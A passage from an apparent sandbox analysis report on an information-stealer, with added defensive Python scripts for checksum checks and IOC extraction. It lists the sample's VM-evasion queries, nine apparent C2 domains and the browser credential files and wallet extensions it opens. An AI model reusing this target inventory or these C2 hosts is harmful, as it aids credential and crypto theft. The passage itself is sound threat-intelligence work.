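    # Pass a PE path to check a real file; otherwise use the constructed skeleton
    # with the report's stored value, which cannot match its tiny body.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    image = open(path, "rb").read() if path else build_minimal_pe(0x3D85D6)
    r = verify(image)
    print(f"stored=0x{r['stored']:x} computed=0x{r['actual']:x} status={r['status']}")
```

Run it against the sample with `python pe_checksum.py BnJxmraqlk.exe` to reproduce the report's two values; the same routine, applied to every section's raw bytes separately, is how a triage script can tell a benign checksum-less build from a binary whose header was rewritten after linking.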

                    Malware Analysis System Evasion

Source: C:\Users\user\Desktop\BnJxmraqlk.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\BnJxmraqlk.exe TID: 6488 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\BnJxmraqlk.exe TID: 2056 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: BnJxmraqlk.exe, 00000000.00000003.2254506430.0000000003C7B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: spottercurvei.click
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305155106.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2295509081.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2304715478.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2339472912.0000000000F0B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
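The nine .shop/.click hostnames in this section all come from one memory region (dump 2165832368 at 0x2D20000), which is what a decrypted C2 list looks like once the stealer has unpacked its configuration and is consistent with the "C2 URLs / IPs found in malware configuration" signature in the overview. Together with the MachineGuid read (victim fingerprint) and the ROOT\SecurityCenter2 AntiVirusProduct query (installed-AV inventory) they are the entries worth extracting from this section. The script below is an added example, not code from the report, from Joe Sandbox or from the sample: it parses such lines, keeps only hostname-shaped values, and groups them by the memory region they were carved from, so that strings from the same decrypted blob stay together. Its reading of the .sdmp token as index.kind.dumpid.address is an assumption about the sandbox's naming scheme, and the sample input is constructed from this report's own entries.

```python
"""Extract network IOCs from Joe Sandbox "String found in binary or memory" lines
and group them by the memory region they were carved from.

Added example for this report; not code from Joe Sandbox or from the sample.
Assumption: a .sdmp source token reads <idx>.<kind>.<dumpid>.<address>.<...>.sdmp;
it is parsed here only to build an (idx, dumpid, address) region key.
"""
import re
from collections import Counter, defaultdict

# Constructed sample input: the nine C2 candidates from the report, one Chrome
# password-manager string and one file name that must not be mistaken for
# hostnames, and one multi-source line.
SAMPLE_LINES = r"""
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: spottercurvei.click
Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305155106.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
""".strip()

LINE_RE = re.compile(
    r"^Source:\s*(?P<sources>.+?\.sdmp)\s*\|\s*(?P<label>[^:|]+):\s*(?P<value>.*)$"
)
DUMP_RE = re.compile(
    r"(?P<idx>[0-9A-F]{8})\.(?P<kind>[0-9A-F]{8})\.(?P<dump>\d+)\.(?P<addr>[0-9A-F]{16})\.",
    re.I,
)
# Hostname shape (RFC 1035 labels); the last label is captured as the TLD.
DOMAIN_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?P<tld>[a-z]{2,63})$", re.I
)
# "window-state.json" satisfies DOMAIN_RE too; reject common file extensions
# so they never reach a DNS blocklist.
FILE_EXTENSIONS = {"json", "exe", "dll", "db", "sqlite", "js", "txt", "log",
                   "dat", "wallet", "ini", "xml", "sys"}


def parse_report_lines(text):
    """Parse 'Source: <sdmp...> | <label>: <value>' lines into dicts."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # process-level lines (no .sdmp source) are skipped
        regions = [
            (d.group("idx"), d.group("dump"), d.group("addr").upper())
            for d in DUMP_RE.finditer(m.group("sources"))
        ]
        entries.append({"regions": regions, "label": m.group("label").strip(),
                        "value": m.group("value").strip()})
    return entries


def looks_like_domain(value):
    m = DOMAIN_RE.match(value)
    return bool(m) and m.group("tld").lower() not in FILE_EXTENSIONS


def extract_domains(entries):
    """Map each hostname-shaped string to the set of regions it was seen in."""
    found = defaultdict(set)
    for e in entries:
        if looks_like_domain(e["value"]):
            found[e["value"].lower()].update(e["regions"])
    return dict(found)


def group_by_region(domain_map):
    """Invert the map: region key -> sorted hostnames carved from it."""
    groups = defaultdict(list)
    for domain, regions in domain_map.items():
        for region in regions:
            groups[region].append(domain)
    return {region: sorted(names) for region, names in groups.items()}


def tld_summary(domain_map):
    return Counter(name.rsplit(".", 1)[1] for name in domain_map)


if __name__ == "__main__":
    domains = extract_domains(parse_report_lines(SAMPLE_LINES))
    for region, names in group_by_region(domains).items():
        print("region idx=%s dump=%s addr=0x%s" % region)
        for name in names:
            print("   ", name)
    print(dict(tld_summary(domains)))
```

Run against the full report the grouping separates the decrypted C2 block from unrelated hostnames the stealer merely read out of browser data (outlook.office365.com, turbotax.intuit.com), which a flat "grep for domains" would mix into the same blocklist.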

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: BnJxmraqlk.exe PID: 612, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: BnJxmraqlk.exe, type: SAMPLE
Source: Yara match | File source: 0.0.BnJxmraqlk.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: BnJxmraqlk.exe, 00000000.00000003.2304715478.0000000000F11000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets8
Source: BnJxmraqlk.exe, 00000000.00000003.2304715478.0000000000F11000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: BnJxmraqlk.exe, 00000000.00000003.2304715478.0000000000F11000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: lmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","e
Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BnJxmraqlk.exe | String found in binary or memory: Wallets/Exodus
Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
Source: BnJxmraqlk.exe | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\BnJxmraqlk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
